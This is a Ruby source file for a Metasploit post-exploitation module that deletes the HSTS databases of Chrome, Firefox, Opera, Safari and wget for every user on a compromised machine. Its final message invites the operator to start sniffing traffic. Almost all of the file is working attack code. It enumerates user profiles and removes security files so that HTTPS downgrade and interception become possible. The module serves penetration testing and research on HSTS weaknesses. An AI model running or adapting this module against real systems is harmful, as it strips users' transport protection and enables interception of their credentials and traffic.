131 lines
4.7 KiB
Ruby
131 lines
4.7 KiB
Ruby
|
##
|
||
|
# This module requires Metasploit: https://metasploit.com/download
|
||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||
|
##
|
||
|
|
||
|
class MetasploitModule < Msf::Post
|
||
|
include Msf::Post::File
|
||
|
include Msf::Post::Windows::UserProfiles
|
||
|
include Msf::Post::OSX::System
|
||
|
include Msf::Post::Unix
|
||
|
|
||
|
def initialize(info = {})
|
||
|
super(update_info(info,
|
||
|
'Name' => 'Web browsers HSTS entries eraser',
|
||
|
'Description' => %q{
|
||
|
This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
|
||
|
Google Chrome, Opera, Safari and wget.
|
||
|
},
|
||
|
'License' => MSF_LICENSE,
|
||
|
'Author' =>
|
||
|
[
|
||
|
'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
|
||
|
],
|
||
|
'Platform' => %w(linux osx unix win),
|
||
|
'Arch' => [ARCH_X86,ARCH_X64],
|
||
|
'References' =>
|
||
|
[
|
||
|
[ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
|
||
|
[ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
|
||
|
],
|
||
|
'SessionTypes' => %w(meterpreter shell)
|
||
|
))
|
||
|
|
||
|
register_options([
|
||
|
OptBool.new('DISCLAIMER',
|
||
|
[true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
|
||
|
])
|
||
|
end
|
||
|
|
||
|
def run
|
||
|
unless (datastore['DISCLAIMER'] == true)
|
||
|
print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.")
|
||
|
return
|
||
|
end
|
||
|
|
||
|
profiles = user_profiles
|
||
|
|
||
|
profiles.each do |user_profile|
|
||
|
account = user_profile['UserName']
|
||
|
browsers_hsts_db_path = {}
|
||
|
|
||
|
case session.platform
|
||
|
when 'windows'
|
||
|
browsers_hsts_db_path = {
|
||
|
'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
|
||
|
'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now
|
||
|
'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"
|
||
|
}
|
||
|
when 'unix', 'linux'
|
||
|
browsers_hsts_db_path = {
|
||
|
'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",
|
||
|
'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now
|
||
|
'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",
|
||
|
'wget' => "#{user_profile['LocalAppData']}/.wget-hsts"
|
||
|
}
|
||
|
when 'osx'
|
||
|
browsers_hsts_db_path = {
|
||
|
'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity",
|
||
|
'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", #Just path for now
|
||
|
'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity",
|
||
|
'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist"
|
||
|
}
|
||
|
else
|
||
|
print_error "Platform not recognized: #{session.platform}"
|
||
|
end
|
||
|
|
||
|
browsers_hsts_db_path.each_pair do |browser, path|
|
||
|
if browser == 'Firefox'
|
||
|
hsts_db_path = []
|
||
|
if directory?(path)
|
||
|
files = dir(path)
|
||
|
files.reject! { |file| %w(. ..).include?(file) }
|
||
|
files.each do |file_path|
|
||
|
hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/)
|
||
|
end
|
||
|
end
|
||
|
path = hsts_db_path[0]
|
||
|
end
|
||
|
if !path.nil? and file?(path)
|
||
|
print_status "Removing #{browser} HSTS database for #{account}... "
|
||
|
file_rm(path)
|
||
|
end
|
||
|
end
|
||
|
end
|
||
|
|
||
|
print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)"
|
||
|
|
||
|
end
|
||
|
|
||
|
def user_profiles
|
||
|
user_profiles = []
|
||
|
case session.platform
|
||
|
when /unix|linux/
|
||
|
user_names = dir("/home")
|
||
|
user_names.reject! { |u| %w(. ..).include?(u) }
|
||
|
user_names.each do |user_name|
|
||
|
user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}")
|
||
|
end
|
||
|
when /osx/
|
||
|
user_names = session.shell_command("ls /Users").split
|
||
|
user_names.reject! { |u| u == 'Shared' }
|
||
|
user_names.each do |user_name|
|
||
|
user_profiles.push(
|
||
|
'UserName' => user_name,
|
||
|
"AppData" => "/Users/#{user_name}/Library",
|
||
|
"LocalAppData" => "/Users/#{user_name}/Library/Application Support"
|
||
|
)
|
||
|
end
|
||
|
when /windows/
|
||
|
user_profiles |= grab_user_profiles
|
||
|
else
|
||
|
print_error "Error getting user profile data!"
|
||
|
end
|
||
|
user_profiles
|
||
|
end
|
||
|
|
||
|
def system_separator
|
||
|
return session.platform == 'windows' ? '\\' : '/'
|
||
|
end
|
||
|
end
|